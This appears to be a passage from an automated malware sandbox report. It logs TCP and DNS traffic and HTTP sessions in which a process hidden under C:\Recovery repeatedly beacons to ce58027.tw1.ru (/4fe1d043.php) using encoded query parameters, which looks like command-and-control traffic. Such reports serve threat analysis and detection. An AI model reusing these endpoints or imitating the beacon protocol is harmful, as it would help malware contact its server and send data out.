Dec 29, 2024 00:07:28.670907974 CET	80	49742	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:28.670953989 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.671004057 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.671158075 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.790642977 CET	80	49742	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:28.790765047 CET	80	49742	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:30.056643009 CET	80	49742	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:30.109713078 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.063379049 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.064522982 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.183686018 CET	80	49742	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:35.183763981 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.184387922 CET	80	49743	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:35.184456110 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.184626102 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:35.304100037 CET	80	49743	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:35.304191113 CET	80	49743	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:36.524277925 CET	80	49743	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:36.578459978 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.545173883 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.546045065 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.811281919 CET	80	49744	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:41.811450005 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.811527014 CET	80	49743	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:41.811600924 CET	49743	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.817550898 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:41.937181950 CET	80	49744	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:41.937211990 CET	80	49744	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:43.252525091 CET	80	49744	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:43.297144890 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.266510010 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.267496109 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.386544943 CET	80	49744	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:48.386615038 CET	49744	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.386990070 CET	80	49745	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:48.387069941 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.387270927 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:48.506839991 CET	80	49745	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:48.506854057 CET	80	49745	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:49.772392035 CET	80	49745	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:49.812745094 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:54.782243967 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:54.782994032 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:54.902205944 CET	80	49745	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:54.902463913 CET	80	49746	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:54.902544022 CET	49745	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:54.902604103 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:54.902853012 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:55.022353888 CET	80	49746	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:55.022519112 CET	80	49746	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:56.374991894 CET	80	49746	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:56.422138929 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.407442093 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.408649921 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.527509928 CET	80	49746	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:01.527578115 CET	49746	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.528279066 CET	80	49754	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:01.528354883 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.528532028 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:01.650368929 CET	80	49754	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:01.653099060 CET	80	49754	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:02.922554970 CET	80	49754	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:02.969024897 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.032119989 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.032907009 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.152081013 CET	80	49754	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:08.152204990 CET	49754	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.152409077 CET	80	49770	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:08.152489901 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.152682066 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:08.272270918 CET	80	49770	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:08.272368908 CET	80	49770	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:09.492234945 CET	80	49770	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:09.547262907 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.500914097 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.501785994 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.623009920 CET	80	49770	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:14.623205900 CET	80	49786	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:14.623378992 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.623384953 CET	49770	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.623560905 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:14.743071079 CET	80	49786	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:14.743185043 CET	80	49786	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:16.010059118 CET	80	49786	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:16.062788010 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.016895056 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.018274069 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.138081074 CET	80	49802	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:21.138228893 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.138501883 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.145767927 CET	80	49786	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:21.145859957 CET	49786	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:21.258079052 CET	80	49802	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:21.258166075 CET	80	49802	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:22.530730009 CET	80	49802	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:22.578438044 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.548125029 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.549022913 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.668104887 CET	80	49802	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:27.668243885 CET	49802	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.668534994 CET	80	49817	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:27.668623924 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.668979883 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:27.788789988 CET	80	49817	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:27.788829088 CET	80	49817	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:29.007096052 CET	80	49817	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:29.062828064 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.016777039 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.017976999 CET	49832	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.137485027 CET	80	49832	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:34.137679100 CET	49832	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.138040066 CET	49832	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.143404007 CET	80	49817	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:34.143518925 CET	49817	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:34.257576942 CET	80	49832	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:34.257627964 CET	80	49832	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:35.666656017 CET	80	49832	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:35.719086885 CET	49832	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:40.674798012 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:40.794476986 CET	80	49847	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:40.796792984 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:40.797029972 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:40.916651964 CET	80	49847	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:40.916681051 CET	80	49847	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:42.144026995 CET	80	49847	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:42.187951088 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.157977104 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.157979012 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.277517080 CET	80	49860	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:47.277667999 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.277765036 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.277914047 CET	80	49847	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:47.277976036 CET	49847	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:47.397183895 CET	80	49860	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:47.397289038 CET	80	49860	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:48.625761032 CET	80	49860	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:48.672760010 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.641730070 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.642863035 CET	49876	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.761531115 CET	80	49860	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:53.761584997 CET	49860	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.762341976 CET	80	49876	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:53.762429953 CET	49876	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.762722015 CET	49876	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:08:53.882225990 CET	80	49876	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:53.882303953 CET	80	49876	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:55.098342896 CET	80	49876	185.114.245.123	192.168.2.4
Dec 29, 2024 00:08:55.144773006 CET	49876	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:09:00.154427052 CET	49892	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:09:00.273967981 CET	80	49892	185.114.245.123	192.168.2.4
Dec 29, 2024 00:09:00.274255037 CET	49892	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:09:00.274534941 CET	49892	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:09:00.394184113 CET	80	49892	185.114.245.123	192.168.2.4
Dec 29, 2024 00:09:00.394231081 CET	80	49892	185.114.245.123	192.168.2.4
Dec 29, 2024 00:09:01.789987087 CET	80	49892	185.114.245.123	192.168.2.4
Dec 29, 2024 00:09:01.844129086 CET	49892	80	192.168.2.4	185.114.245.123

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 00:07:05.967597961 CET	63602	53	192.168.2.4	1.1.1.1
Dec 29, 2024 00:07:06.599087000 CET	53	63602	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 00:07:05.967597961 CET	192.168.2.4	1.1.1.1	0x6c7	Standard query (0)	ce58027.tw1.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 00:07:06.599087000 CET	1.1.1.1	192.168.2.4	0x6c7	No error (0)	ce58027.tw1.ru		185.114.245.123	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ce58027.tw1.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:06.740266085 CET	406	OUT	GET /4fe1d043.php?sfxSMm=rxb3wPgb0HPV&2e6ea3aaeac867bc064a534e31e365d4=6f9cfd298d9789ebd2787a0e63b0d086&0f0872650c0ba62ba5efb31d4a3a3070=QNkVjYlNmNihDZkJjM3IWO5QDZ4Y2NiV2NxIDOzYmYyEWNzYGMlRjM&sfxSMm=rxb3wPgb0HPV HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:08.224422932 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 4a 79 4e 6d 4e 7a 4d 6b 46 47 5a 77 45 57 4d 34 45 32 59 7a 4d 54 5a 33 51 7a 4d 6c 46 6d 4d 6c 56 54 4d 68 4a 57 59 68 52 54 4d 32 49 69 4f 69 51 57 4e 6c 46 47 4d 31 67 54 4f 68 4e 32 4e 30 49 44 5a 6d 46 54 5a 31 49 44 4d 6b 5a 54 4e 6c 56 32 4e 31 59 47 4e 6d 56 6d 4e 69 77 69 49 6d 46 31 62 33 39 55 61 4b 6c 6e 57 59 4a 56 65 61 68 6c 57 31 4a 47 4d 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 32 54 46 70 56 56 57 5a 56 4f 7a 4a 6d 4d 4b 52 58 5a 57 35 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 69 64 55 4f 70 4a 47 57 73 52 56 5a 58 35 55 64 61 68 6c 53 35 52 32 56 4f 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 4a 6c 52 4f 5a 56 53 71 39 57 61 61 64 6c 55 32 46 31 4d 73 70 6d 59 74 5a 56 65 6a 35 6d 56 71 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 [TRUNCATED] Data Ascii: 9JyNmNzMkFGZwEWM4E2YzMTZ3QzMlFmMlVTMhJWYhRTM2IiOiQWNlFGM1gTOhN2N0IDZmFTZ1IDMkZTNlV2N1YGNmVmNiwiImF1b39UaKlnWYJVeahlW1JGMOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavl2TFpVVWZVOzJmMKRXZW5UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaidUOpJGWsRVZX5UdahlS5R2VOZmYtxmbkdFe3JmMW5WSpF0ZDl2dpJlROZVSq9WaadlU2F1MspmYtZVej5mVqhlM1AnWzY1cjdUOspVeJdWSB92cJ1Gd5JWMsZGZyY1TMFDeollMslnWXFjQJp2bpp1V1YXZtZFdhhlUmJWbs5GZXh3diJjVulUaBd2QpdXaNRUSp9UaKpHZXx2aZZlS1klMGlHZX5kaRdVN2FGWShWWykzcYJTNwp1MWN3YHlDbalXSnlUQvNXSqdmMNRUQ15ERjRXSq9WaadlUxQ2Rs5mYtlzcYJTNwp1MWN3YHlDbalXSnlUQvNXSq1UeNR1Y11ERRl2TppEbahkVwEGWShmYGlTdhdFZxIGSCZnWXNWaJNUQLx0QKhWWywWeadVMCl0RoBzYtlzTJp2bpp1VxgGVuJVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QKJEVplkNJ1mVrJGMOBjYtZVdhhlU1JmMOZmYtxmbkdFe3JmMW5WSpF0ZDlGesNmM4hmWq9WaahlUoNGbSJkVuZFbYJTNwp1MWN3YHlDbalXSnlUQvNXTE9WaWVlV1FmV5UXYXRWMihkQ2p1VjlWSDF0SMNkS6pFWShGZG10ZadkVwE2V1YVSq9WaadVMoRlbslHZHVTMiJjTmJWbs5GZXh3diJjVulUaBd2QpdXaVFTVp9UaKxmWHlDRlhlSwImbWZXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJhXTEVVaPlmS [TRUNCATED]
Dec 29, 2024 00:07:08.224447966 CET	1107	IN	Data Raw: 4e 58 53 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 Data Ascii: NXSplkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjW
Dec 29, 2024 00:07:08.493328094 CET	702	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=0VfiIiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:07:08.951164961 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 29, 2024 00:07:08.989958048 CET	1217	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&04d4a5280b397c7cb744792a503cb48e=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2A [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:07:09.445563078 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:08.618202925 CET	2103	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:07:09.954200029 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:07:13.488161087 CET	705	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=QX9JSUNJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIzMWZ1czNwYjZ4cjN5gTY0U2NjVmM4IDZllDN0QjYkRDNmFmMmRWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:07:14.888475895 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
